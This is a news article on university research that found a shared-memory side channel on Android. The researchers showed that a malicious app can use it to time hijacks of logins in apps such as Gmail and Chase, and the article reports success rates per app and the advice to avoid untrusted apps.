Same story, another day. No one should think anything is safe on the internet anymore. Researchers at the University of California Riverside Bourns College of Engineering and the University of Michigan have spotted a weakness they think exists across every major operating system including iOS, Android and Windows.
This weakness could allow malicious apps to grab your personal information.
The researchers only tested the method on an Android phone, but believe it’s possible across all three operating systems because they share a similar feature. Any app can access a mobile device’s shared memory.
“The assumption has always been that these apps can’t interfere with each other easily,” said Zhiyun Qian, an associate professor at UC Riverside, in a press statement. “We show that assumption is not correct and one app can in fact significantly impact another and result in harmful consequences for the user.
So, how does the hack work? First, the user needs to download a safe looking app, but that is actually malicious. Think those sketchy looking background wallpaper apps. Once the malicious app is installed, “the researchers are able to exploit a newly discovered public side channel — the shared memory statistics of a process, which can be accessed without any privileges,” according to the press release.
Here’s how the press release explains the attack. “The researchers monitor changes in shared memory and are able to correlate changes to what they call an “activity transition event,” which includes such things as a user logging into Gmail or H&R Block or a user taking a picture of a check so it can be deposited online, without going to a physical CHASE Bank. Augmented with a few other side channels, the authors show that it is possible to fairly accurately track in real-time which activity a victim app is in.”
Now, there’s two things that need to happen for the attack to work. The attack has to take place at the exact moment the user is logging into the app or taking a picture. And, it needs to be done without alerting the user.
“By design, Android allows apps to be preempted or hijacked,” Qian said. “But the thing is you have to do it at the right time so the user doesn’t notice. We do that and that’s what makes our attack unique.”
How did all the apps stack up? Gmail and H&R Block were the easiest to hack with a 92% success rate. Newegg, WebMD, CHASE Bank and Hotels.com saw hack success rates over 80%. Amazon was tougher at just 48%.
What made Amazon so hard? Users could transition to several different activities within the app, making it harder for the researchers to guess.
What can you do to protect yourself? Qian says it best. “Don’t install untrusted apps.”